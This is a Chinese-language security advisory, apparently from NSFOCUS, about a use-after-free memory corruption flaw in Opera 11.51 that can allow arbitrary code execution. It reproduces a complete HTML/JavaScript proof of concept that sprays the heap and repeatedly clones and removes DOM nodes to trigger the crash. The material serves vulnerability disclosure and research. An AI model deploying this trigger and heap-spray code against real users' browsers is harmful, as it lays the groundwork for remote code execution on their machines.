安全研究
安全漏洞
Opera Web浏览器树遍历释放后重用内存破坏漏洞
发布日期:2011-10-24
更新日期:2011-10-24
受影响系统:Opera Software Opera Web Browser 11.51
描述:
BUGTRAQ ID:
50230
Opera为来自挪威的一个极为出色的浏览器,具有速度快、节省系统资源、订制能力强、安全性高以及体积小等特点,目前已经是最受欢迎的浏览器之一。
Opera浏览器在实现上存在远程内存破坏漏洞,可导致执行任意代码。
<*来源:Roberto Suggi Liverani
链接:
http://dl.packetstormsecurity.net/1110-exploits/opera-useafterfree.txt
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<html> <head> <script> function spray() { for(S="\u0c0c",k=[],y=0;y++<197;)y<20?S+=S:k[y]=[S.substr(22)+"\u4141\u4141"].join("") } function crash(){ // Clone Object -> Remove Object - > Append Reference) obj = document.body.children[0].cloneNode(true) document.body.removeChild(document.body.children[0]) document.body.appendChild(obj) // Clone Object -> Remove Object - > Append Reference) obj = document.body.children[0].cloneNode(true) document.body.removeChild(document.body.children[0]) document.body.appendChild(obj) // Clone Object -> Remove Object - > Append Reference) obj = document.body.children[0].cloneNode(true) document.body.removeChild(document.body.children[0]) document.body.appendChild(obj) // Clone Object -> Remove Object - > Heap Spray obj = document.body.children[1].cloneNode(true) document.body.removeChild(document.body.children[1]); spray(); // if this is removed Opera won't crash } </script> </head> <body onload="crash();"> <em contenteditable="true">a</em> <strong contenteditable="true">a</strong> </body> </html>
建议:
厂商补丁:
Opera Software
--------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.opera.com/support/浏览次数:2345
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |